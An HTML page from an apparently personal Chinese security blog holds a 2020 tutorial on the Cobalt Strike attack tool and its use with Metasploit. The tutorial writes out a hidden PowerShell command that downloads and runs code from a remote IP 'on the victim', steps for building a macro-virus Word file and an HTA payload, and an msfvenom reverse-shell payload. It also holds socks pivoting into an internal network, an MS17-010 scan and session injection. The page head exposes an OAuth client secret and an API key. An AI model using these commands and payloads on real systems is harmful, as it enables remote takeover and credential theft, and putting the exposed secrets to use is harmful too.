<!DOCTYPE html><html><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="CobaltStrike"><meta name="keywords" content="渗透工具,cobaltstrike"><meta name="author" content="ye1s,undefined"><meta name="copyright" content="ye1s"><title>CobaltStrike【ye1s】</title><link rel="stylesheet" href="/css/fan.css"><link rel="stylesheet" href="/css/thirdparty/jquery.mCustomScrollbar.min.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><link rel="icon" href="/favicon.ico"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch.min.css"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4/dist/instantsearch-theme-algolia.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.4"></script><!-- link(rel="dns-prefetch" href="https://cdn.jsdelivr.net")--><!-- link(rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css")--><!-- script(src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer)--><!-- script(src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML")--><script src="/js/mathjax/mathjax.js"></script><script type="text/x-mathjax-config">MathJax.Hub.Config({
    tex2jax: {inlineMath: [['$', '$'], ['\\(', '\\)']]}
});
</script><script>var isPassword = '' || false;
if (isPassword) {
    if (prompt('请输入文章密码') !== '') {
        alert('密码错误！');
        history.back();
    }
}</script><script>window.GLOBAL_CONFIG = {
  root: '/',
  algolia: {"appId":"LKL6Q0GQJM","apiKey":"03829f64e2f5c11e4a5e2b8e51e24eb9","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容:${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  gitment: {"owner":"ye1sec","repo":"comments","client_id":"d5ece338867af32b6dfa","client_secret":"2caf36bbd47977524017f95105315fc9e65f0577"},
}</script><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="ye1s" type="application/atom+xml">
</head><body><canvas id="universe"></canvas><!--#body--><div id="sidebar"><div class="toggle-sidebar-info button-hover"><span data-toggle="文章目录">站点概览</span></div><div class="sidebar-toc"><div class="sidebar-toc-title">目录</div><div class="sidebar-toc-progress"><span class="progress-notice">您已阅读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc-progress-bar"></div></div><div class="sidebar-toc-content" id="sidebar-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#0x1CS安装"><span class="toc-number">1.</span> <span class="toc-text">0x1CS安装</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x2-listener"><span class="toc-number">2.</span> <span class="toc-text">0x2 listener</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-1http-beacon"><span class="toc-number">2.1.</span> <span class="toc-text">0x2.1http beacon</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-2-smb-beacon"><span class="toc-number">2.2.</span> <span class="toc-text">0x2.2 smb beacon</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-1-HTML-Application"><span class="toc-number">2.3.</span> <span class="toc-text">0x3.1 HTML Application</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-2-ms-office-macro"><span class="toc-number">2.4.</span> <span class="toc-text">0x3.2 ms office macro</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x3-3"><span class="toc-number">2.5.</span> <span class="toc-text">0x3.3</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#0x4-与Metasploit-结合"><span class="toc-number">3.</span> <span class="toc-text">0x4 与Metasploit 结合</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-1socks代理"><span class="toc-number">3.1.</span> <span class="toc-text">0x4.1socks代理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x4-2CS与MSF会话互传"><span class="toc-number">3.2.</span> <span class="toc-text">0x4.2CS与MSF会话互传</span></a></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info-avatar"><img class="author-info-avatar-img" src="/avatar.png"></div><div class="author-info-name">ye1s</div><div class="author-info-description"></div><div class="links-buttons"><a class="links-button button-hover" href="https://github.com/ye1sec" target="_blank">GitHub<i class="icon-dot bg-color5"></i></a><a class="links-button button-hover" href="mailto:431774437@qq.com" target="_blank">E-Mail<i class="icon-dot bg-color7"></i></a><a class="links-button button-hover" href="tencent://message/?uin=431774437&amp;Site=&amp;Menu=yes" target="_blank">QQ<i class="icon-dot bg-color7"></i></a></div><div class="author-info-articles"><a class="author-info-articles-archives article-meta" href="/archives"><span class="pull-top">日志</span><span class="pull-bottom">200</span></a><a class="author-info-articles-tags article-meta" href="/tags"><span class="pull-top">标签</span><span class="pull-bottom">149</span></a><a class="author-info-articles-categories article-meta" href="/categories"><span class="pull-top">分类</span><span class="pull-bottom">12</span></a></div><div class="friend-link"><a class="friend-link-text" href="http://www.m00nback.xyz/" target="_blank">MoonBack</a><a class="friend-link-text" target="_blank">待定</a></div></div></div><div id="main-container"><header><div id="menu-outer"><i class="menu-list-icon fas fa-bars"></i><nav id="menu-inner"><a class="menu-item" href="/">首页</a><a class="menu-item" href="/tags">标签</a><a class="menu-item" href="/categories">分类</a><a class="menu-item" href="/archives">归档</a><a class="menu-item" href="/about">关于</a></nav><div class="right-info"><a class="search social-icon"><i class="fas fa-search"></i><span> 搜索</span></a><a class="title-name" href="/">ye1s</a><span id="now-time"></span></div></div></header><div id="content-outer"><div id="content-inner"><article id="post"><div class="post-header"><div class="title">CobaltStrike</div><div class="container"><time class="button-hover post-date"><i class="fas fa-calendar-alt article-icon" aria-hidden="true"></i> 发表于 2020-02-08 | 更新于 2020-04-13</time><!--time.button-hover.post-date #[i.fas.fa-calendar-alt.article-icon(aria-hidden="true")] #[=__('post.modified')] #[=date(page['updated'], config.date_format)]--><div class="button-hover categories"><i class="fa fa-inbox article-icon" aria-hidden="true"></i><a class="link-a" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></div><div class="button-hover tags"><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7/">渗透工具</a><span>&nbsp;|&nbsp;</span><i class="fa fa-tag article-icon" aria-hidden="true"></i><a class="link-a" href="/tags/cobaltstrike/">cobaltstrike</a></div></div></div><div class="main-content"><p>Cobalt Strike 是一款不错的渗透测试工具，拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发，socket 代理，office 攻击，文件捆绑，钓鱼等多种功能 。</p>
<a id="more"></a>


<p><a href="https://www.bilibili.com/video/av45380497" target="_blank" rel="noopener">Cobalt_Strike全套教程视频</a></p>
<h1 id="0x1CS安装"><a href="#0x1CS安装" class="headerlink" title="0x1CS安装"></a>0x1CS安装</h1><p>Cobalt Strike3.8 工具下载 链接：<a href="https://pan.baidu.com/s/1Zi5HuncVhlNKdeu_zptDmQ" target="_blank" rel="noopener">https://pan.baidu.com/s/1Zi5HuncVhlNKdeu_zptDmQ</a><br>提取码：7ckh</p>
<p>Linux下启动 teamserver  </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;teamserver 服务器外网ip 客户端连接密码</span><br></pre></td></tr></table></figure>

<p><img src="../../images/tool/CS/cs1.png" alt=""></p>
<p>客户端连接<br>点击cobalstrike.jar客户端，填写相应信息</p>
<p><img src="../../images/tool/CS/cs2.png" alt=""></p>
<h1 id="0x2-listener"><a href="#0x2-listener" class="headerlink" title="0x2 listener"></a>0x2 listener</h1><p>一个“监听”就是一个等待连接被入侵的系统的服务器。</p>
<p>CS 的监视器 有两个作用， </p>
<ol>
<li>是告诉 CS 去为任何一种建立攻击载荷处理器;</li>
<li>那儿有一个被命名的别名是给处理器和设置信息作为参考的  </li>
</ol>
<p>攻击载荷有三种类型:</p>
<ol>
<li>操作系统 </li>
<li>攻击载荷名称 </li>
<li>传输器 </li>
</ol>
<p>例如:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">windows/beacon_http/reverse_http</span><br></pre></td></tr></table></figure>
<p>是在 windows 操作系统下用 reverse_http 传输器 来进行 beacon_http 攻击载荷    </p>
<p>stager(传输器) 是一个很小的代码,它连接并下载真实的 攻击载荷 并且插入内存    </p>
<p>CS 有两种监视器:</p>
<ol>
<li>Beacon 为内置的 Listener，即在目标主机执行相应的payload，获取 shell 到 CS 上；其中包含DNS、HTTP、SMB。</li>
<li>Foreign为外部结合的 Listener，常用于 MSF 的结合，例如获取 meterpreter 到 MSF 上。</li>
</ol>
<p>beacon 命令  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br></pre></td><td class="code"><pre><span class="line">Command                   Description</span><br><span class="line">    -------                   -----------</span><br><span class="line">    browserpivot              注入受害者浏览器进程</span><br><span class="line">    bypassuac                 绕过UAC</span><br><span class="line">    cancel                    取消正在进行的下载</span><br><span class="line">    <span class="built_in">cd</span>                        切换目录</span><br><span class="line">    checkin                   强制让被控端回连一次</span><br><span class="line">    clear                     清除beacon内部的任务队列</span><br><span class="line">    connect                   Connect to a Beacon peer over TCP</span><br><span class="line">    covertvpn                 部署Covert VPN客户端</span><br><span class="line">    cp                        复制文件</span><br><span class="line">    dcsync                    从DC中提取密码哈希</span><br><span class="line">    desktop                   远程VNC</span><br><span class="line">    dllinject                 反射DLL注入进程</span><br><span class="line">    dllload                   使用LoadLibrary将DLL加载到进程中</span><br><span class="line">    download                  下载文件</span><br><span class="line">    downloads                 列出正在进行的文件下载</span><br><span class="line">    drives                    列出目标盘符</span><br><span class="line">    elevate                   尝试提权</span><br><span class="line">    execute                   在目标上执行程序(无输出)</span><br><span class="line">    execute-assembly          在目标上内存中执行本地.NET程序</span><br><span class="line">    <span class="built_in">exit</span>                      退出beacon</span><br><span class="line">    getprivs                  Enable system privileges on current token</span><br><span class="line">    getsystem                 尝试获取SYSTEM权限</span><br><span class="line">    getuid                    获取用户ID</span><br><span class="line">    hashdump                  转储密码哈希值</span><br><span class="line">    <span class="built_in">help</span>                      帮助</span><br><span class="line">    inject                    在特定进程中生成会话</span><br><span class="line">    jobkill                   杀死一个后台任务</span><br><span class="line">    <span class="built_in">jobs</span>                      列出后台任务</span><br><span class="line">    kerberos_ccache_use       从ccache文件中导入票据应用于此会话</span><br><span class="line">    kerberos_ticket_purge     清除当前会话的票据</span><br><span class="line">    kerberos_ticket_use       从ticket文件中导入票据应用于此会话</span><br><span class="line">    keylogger                 键盘记录</span><br><span class="line">    <span class="built_in">kill</span>                      结束进程</span><br><span class="line">    link                      Connect to a Beacon peer over a named pipe</span><br><span class="line">    logonpasswords            使用mimikatz转储凭据和哈希值</span><br><span class="line">    ls                        列出文件</span><br><span class="line">    make_token                创建令牌以传递凭据</span><br><span class="line">    mimikatz                  运行mimikatz</span><br><span class="line">    mkdir                     创建一个目录</span><br><span class="line">    mode dns                  使用DNS A作为通信通道(仅限DNS beacon)</span><br><span class="line">    mode dns-txt              使用DNS TXT作为通信通道(仅限D beacon)</span><br><span class="line">    mode dns6                 使用DNS AAAA作为通信通道(仅限DNS beacon)</span><br><span class="line">    mode http                 使用HTTP作为通信通道</span><br><span class="line">    mv                        移动文件</span><br><span class="line">    net                       net命令</span><br><span class="line">    note                      备注       </span><br><span class="line">    portscan                  进行端口扫描</span><br><span class="line">    powerpick                 通过Unmanaged PowerShell执行命令</span><br><span class="line">    powershell                通过powershell.exe执行命令</span><br><span class="line">    powershell-import         导入powershell脚本</span><br><span class="line">    ppid                      Set parent PID <span class="keyword">for</span> spawned post-ex <span class="built_in">jobs</span></span><br><span class="line">    ps                        显示进程列表</span><br><span class="line">    p**ec                    Use a service to spawn a session on a host</span><br><span class="line">    p**ec_psh                Use PowerShell to spawn a session on a host</span><br><span class="line">    psinject                  在特定进程中执行PowerShell命令</span><br><span class="line">    pth                       使用Mimikatz进行传递哈希</span><br><span class="line">    <span class="built_in">pwd</span>                       当前目录位置</span><br><span class="line">    reg                       Query the registry</span><br><span class="line">    rev2self                  恢复原始令牌</span><br><span class="line">    rm                        删除文件或文件夹</span><br><span class="line">    rportfwd                  端口转发</span><br><span class="line">    run                       在目标上执行程序(返回输出)</span><br><span class="line">    runas                     以另一个用户权限执行程序</span><br><span class="line">    runasadmin                在高权限下执行程序</span><br><span class="line">    runu                      Execute a program under another PID</span><br><span class="line">    screenshot                屏幕截图</span><br><span class="line">    setenv                    设置环境变量</span><br><span class="line">    shell                     cmd执行命令</span><br><span class="line">    shinject                  将shellcode注入进程</span><br><span class="line">    shspawn                   生成进程并将shellcode注入其中</span><br><span class="line">    sleep                     设置睡眠延迟时间</span><br><span class="line">    socks                     启动SOCKS4代理</span><br><span class="line">    socks stop                停止SOCKS4</span><br><span class="line">    spawn                     Spawn a session </span><br><span class="line">    spawnas                   Spawn a session as another user</span><br><span class="line">    spawnto                   Set executable to spawn processes into</span><br><span class="line">    spawnu                    Spawn a session under another PID</span><br><span class="line">    ssh                       使用ssh连接远程主机</span><br><span class="line">    ssh-key                   使用密钥连接远程主机</span><br><span class="line">    steal_token               从进程中窃取令牌</span><br><span class="line">    timestomp                 将一个文件时间戳应用到另一个文件</span><br><span class="line">    unlink                    Disconnect from parent Beacon</span><br><span class="line">    upload                    上传文件</span><br><span class="line">    wdigest                   使用mimikatz转储明文凭据</span><br><span class="line">    winrm                     使用WinRM在主机上生成会话</span><br><span class="line">    wmi                       使用WMI在主机上生成会话</span><br><span class="line">    argue                      进程参数欺骗</span><br><span class="line">复制代码</span><br></pre></td></tr></table></figure>




<p>beacon有三种类型:</p>
<ol>
<li>http beacon </li>
<li>dns  beacon</li>
<li>smb beacon</li>
</ol>
<h2 id="0x2-1http-beacon"><a href="#0x2-1http-beacon" class="headerlink" title="0x2.1http beacon"></a>0x2.1http beacon</h2><p>创建Beacon Listener<br>Cobalt Strike-&gt;Listeners<br><img src="../../images/tool/CS/cs3.png" alt=""></p>
<p>创建 powershell 恶意代码<br>Attacks-&gt;Web Drive-by-&gt;scripted web delivery<br><img src="../../images/tool/CS/cs4.png" alt=""><br>复制里面的命令，并点击 ok<br><img src="../../images/tool/CS/cs5.png" alt=""><br>在受害机上执行该命令   </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -w hidden -c <span class="string">"IEX ((new-object net.webclient).downloadstring('http://120.79.24.186/a'))"</span></span><br></pre></td></tr></table></figure>
<p><img src="../../images/tool/CS/cs6.png" alt=""><br>受害机成功上线<br><img src="../../images/tool/CS/cs7.png" alt=""></p>
<h2 id="0x2-2-smb-beacon"><a href="#0x2-2-smb-beacon" class="headerlink" title="0x2.2 smb beacon"></a>0x2.2 smb beacon</h2><p>SMB Beacon使用命名管道通过父级Beacon进行通讯，当两个Beacons连接后，子Beacon从父Beacon获取到任务并发送。因为连接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效。 也经常利用 smb 提升权限。<br><img src="../../images/tool/CS/cs8.png" alt=""><br>选择目标，点击Interact ，在beacon&gt;中输入 shell whoami/groups 查看当前权限，随后bypassuac smb ，成功后可看到产生一个新的 beacon 会话 ，yesi<code>*</code> 有带<code>*</code>号，表示为管理员。<br><img src="../../images/tool/CS/cs30.png" alt=""></p>
<p>** DNS Beacon ** </p>
<p>DNS Beacon在绕过防火墙 权限维持上非常有效</p>
<h2 id="0x3-1-HTML-Application"><a href="#0x3-1-HTML-Application" class="headerlink" title="0x3.1 HTML Application"></a>0x3.1 HTML Application</h2><p>ATTACK-&gt;packages-&gt; HTML Application </p>
<p><img src="../../images/tool/CS/cs11.png" alt=""><br>点击Generate,并保存evil.hta<br><img src="../../images/tool/CS/cs12.png" alt=""> </p>
<p>将生成的evil.hta,上传到 CS 的服务器上<br><img src="../../images/tool/CS/cs13.png" alt=""><br>点击 Launch<br><img src="../../images/tool/CS/cs14.png" alt=""><br>复制 evil.hta 的 url 地址,并点击 ok<br><img src="../../images/tool/CS/cs15.png" alt=""><br>让受害机访问 此 url 链接，并运行 evil.hta 文件<br><img src="../../images/tool/CS/cs16.png" alt=""></p>
<h2 id="0x3-2-ms-office-macro"><a href="#0x3-2-ms-office-macro" class="headerlink" title="0x3.2 ms office macro"></a>0x3.2 ms office macro</h2><p>首先我们需要制作一个word宏病毒来进行远控操作。在Cobalt strike中，需要新建一个监听程序来进行监听 </p>
<p>然后点击attacks -&gt; packages -&gt; ms office macro， 选择前面所创建的listener<br><img src="../../images/tool/CS/cs26.png" alt=""></p>
<p><img src="../../images/tool/CS/cs27.png" alt=""><br>复制宏内容，然后打开一个word文档，添加宏，记得添加的地方不能有误，添加宏的位置在 视图 -&gt; 宏。创建宏以后添加代码是在project中，这点不能搞错，如下图<br><img src="../../images/tool/CS/cs28.png" alt=""><br>添加完成以后，只需要保存为启用宏的word就可以了，这样就制作为一个word宏病毒文件<br><img src="../../images/tool/CS/cs29.png" alt=""></p>
<h2 id="0x3-3"><a href="#0x3-3" class="headerlink" title="0x3.3"></a>0x3.3</h2><h1 id="0x4-与Metasploit-结合"><a href="#0x4-与Metasploit-结合" class="headerlink" title="0x4 与Metasploit 结合"></a>0x4 与Metasploit 结合</h1><p>CobalStrike 与 Metasploit 均是渗透利器，各有所长。前者更适合做稳控平台，后者则更擅长内网各类探测搜集与漏洞利用  </p>
<h2 id="0x4-1socks代理"><a href="#0x4-1socks代理" class="headerlink" title="0x4.1socks代理"></a>0x4.1socks代理</h2><p>通过Beacon内置的socks功能在VPS上开启代理端口，打通目标内网通道，之后将本地Metasploit直接带入目标内网，进行横向渗透     </p>
<p>首先，到已控目标机的Beacon下将socks代理开启。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; socks 1024</span><br></pre></td></tr></table></figure>
<p><img src="../../images/tool/CS/cs17.png" alt=""><br>开菜单栏中的View &gt; Proxy Pivots，点击Tunnel复制代理连接到Metasploit中<br><img src="../../images/tool/CS/cs18.png" alt=""><br><img src="../../images/tool/CS/cs19.png" alt=""><br>在Metasploit设置 socks代理，探测目标内网中存在MS17_010漏洞的主机</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; setg Proxies socks4:120.79.24.186:1024    <span class="comment">#让msf所有模块的流量都通过此代理走。(setg全局设置)</span></span><br><span class="line">Proxies =&gt; socks4:120.79.24.186:1024</span><br><span class="line">msf5 &gt; setg ReverseAllowProxy <span class="literal">true</span>  <span class="comment">#允许反向代理，通过socks反弹shell，建立双向通道。(探测可以不设置此项)</span></span><br><span class="line">ReverseAllowProxy =&gt; <span class="literal">true</span></span><br><span class="line">msf5 &gt; use auxiliary/scanner/smb/smb_ms17_010</span><br><span class="line">msf5 auxiliary(scanner/smb/smb_ms17_010) &gt; <span class="built_in">set</span> rhosts 192.168.3.0/24</span><br><span class="line">rhosts =&gt; 192.168.3.0/24</span><br><span class="line">msf5 auxiliary(scanner/smb/smb_ms17_010) &gt; <span class="built_in">set</span> threads 100 </span><br><span class="line">threads =&gt; 100</span><br><span class="line">msf5 auxiliary(scanner/smb/smb_ms17_010) &gt; run</span><br><span class="line"></span><br><span class="line">[*] 192.168.3.0/24:445    - Scanned  71 of 256 hosts (27% complete)</span><br><span class="line">[+] 192.168.3.3:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)</span><br></pre></td></tr></table></figure>
<h2 id="0x4-2CS与MSF会话互传"><a href="#0x4-2CS与MSF会话互传" class="headerlink" title="0x4.2CS与MSF会话互传"></a>0x4.2CS与MSF会话互传</h2><p>** 0x4.2.1CobaltStrike派生Metasploit ** </p>
<p>当CobaltStrike获得了一个上线机器，想把这个目标传给Metasploit中的meterpreter，获得一个session进行控制。在Metasploit执行以下命令  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/multi/handler</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> payload windows/meterpreter/reverse_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/reverse_tcp</span><br><span class="line">msf5 exploit(multi/handler) &gt; <span class="built_in">set</span> lhost 192.168.3.129</span><br><span class="line">lhost =&gt; 192.168.3.129</span><br><span class="line">setmsf5 exploit(multi/handler) &gt; <span class="built_in">set</span> lport 5555</span><br><span class="line">lport =&gt; 5555</span><br><span class="line">msf5 exploit(multi/handler) &gt; run </span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.3.129:5555</span><br></pre></td></tr></table></figure>
<p>之后使用CobaltStrike创建一个windows/foreign/reverse_tcp的Listener。其中IP为Metasploit的监听地址，端口为Metasploit所监听的端口<br><img src="../../images/tool/CS/cs20.png" alt=""><br>然后选中计算机，右键-&gt;Spawn：选择MSF的监听器 </p>
<p><img src="../../images/tool/CS/cs21.png" alt=""><br>一开始没有成功</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">[*] Meterpreter session 1 opened (192.168.3.129:5555 -&gt; 192.168.3.3:50112) at 2020-02-08 09:56:43 -0500</span><br><span class="line"></span><br><span class="line">[*] 192.168.3.3 - Meterpreter session 8 closed.  Reason: Died</span><br></pre></td></tr></table></figure>
<p>尝试将受害者的防火墙关闭<br><img src="../../images/tool/CS/cs25.png" alt=""></p>
<p>** 0x4.2.2 Metasploit派生CobaltStrike ** </p>
<p>Metasploit设置监听<br><img src="../../images/tool/CS/cs22.png" alt=""><br>msfvenom 生成payload </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.129 LPORT=5555 -f exe &gt; shell.exe</span><br></pre></td></tr></table></figure>
<p>将生成的shell.exe，让受害机点击运行, msf成功得到一个session<br><img src="../../images/tool/CS/cs23.png" alt=""><br>在CobaltStrike中创建一个监听者，和上一步类似，这里host需要修改为CobaltStrike的IP，创建好之后便监听4444端口，等待着被控机连接<br><img src="../../images/tool/CS/cs24.png" alt=""></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">meterpreter &gt; background </span><br><span class="line">[*] Backgrounding session 6...</span><br><span class="line">msf5 exploit(multi/handler) &gt;  use exploit/windows/<span class="built_in">local</span>/payload_inject </span><br><span class="line">msf5 exploit(windows/<span class="built_in">local</span>/payload_inject) &gt; <span class="built_in">set</span> payload windows/meterpreter/reverse_http</span><br><span class="line">payload =&gt; windows/meterpreter/reverse_http</span><br><span class="line">msf5 exploit(windows/<span class="built_in">local</span>/payload_inject) &gt; <span class="built_in">set</span> lhost 120.79.24.186</span><br><span class="line">lhost =&gt; 120.79.24.186</span><br><span class="line">msf5 exploit(windows/<span class="built_in">local</span>/payload_inject) &gt; <span class="built_in">set</span> lport 4444</span><br><span class="line">lport =&gt; 4444</span><br><span class="line">msf5 exploit(windows/<span class="built_in">local</span>/payload_inject) &gt; <span class="built_in">set</span> DisablePayloadHandler <span class="literal">true</span>   </span><br><span class="line">DisablePayloadHandler =&gt; <span class="literal">true</span></span><br><span class="line">msf5 exploit(windows/<span class="built_in">local</span>/payload_inject) &gt; <span class="built_in">set</span> session 6</span><br><span class="line">session =&gt; 6</span><br><span class="line">msf5 exploit(windows/<span class="built_in">local</span>/payload_inject) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Running module against YESI-PC</span><br><span class="line">[-] PID  does not actually exist.</span><br><span class="line">[*] Launching notepad.exe...</span><br><span class="line">[*] Preparing <span class="string">'windows/meterpreter/reverse_http'</span> <span class="keyword">for</span> PID 2860</span><br></pre></td></tr></table></figure>
<p>这里倒是没有成功，暂留，日后补充。   </p>
<p>参考文章:  </p>
<p><a href="https://www.cnblogs.com/nongchaoer/p/12055317.html" target="_blank" rel="noopener">CobaltStrike与Metasploit实战联动</a><br><a href="https://www.freebuf.com/sectool/124905.html" target="_blank" rel="noopener">利用Cobalt strike一步步教你发送钓鱼邮件</a></p>
</div><div class="post-copyright"><div class="post-copyright-author"><span class="post-copyright-meta">本文作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ye1s</a></span></div><div class="post-copyright-type"><span class="post-copyright-meta">本文链接: </span><span class="post-copyright-info"><a href="https://blog.cfyqy.com/article/45c442a2.html">https://blog.cfyqy.com/article/45c442a2.html</a></span></div><div class="post-copyright-notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://blog.cfyqy.com">ye1s</a>！</span></div></div><div class="post-copyright" id="comments-container"><script src="/js/comments/gitment.js"></script></div><script>let arr = location.href.split('/#more')[0].split('/');
let title = arr[arr.length - 1];
if (title === '') {
    title = arr[arr.length - 2]
}
var flag = false;
var gitFun = function () {
    try {
        var gitmentObj = window.GLOBAL_CONFIG.gitment;
        var gitment = new Gitment({
            id: decodeURI(title), // 可选。默认为 location.href
            owner: gitmentObj.owner,
            repo: gitmentObj.repo,
            oauth: {
                client_id: gitmentObj.client_id,
                client_secret: gitmentObj.client_secret
            },
        });
        gitment.render('comments-container');
        flag = true;
    } catch (e) {
        flag = false;
    }
}
var setIn = setInterval(() => {
    if (!flag) {
        gitFun();
    } else {
        clearInterval(setIn);
    }
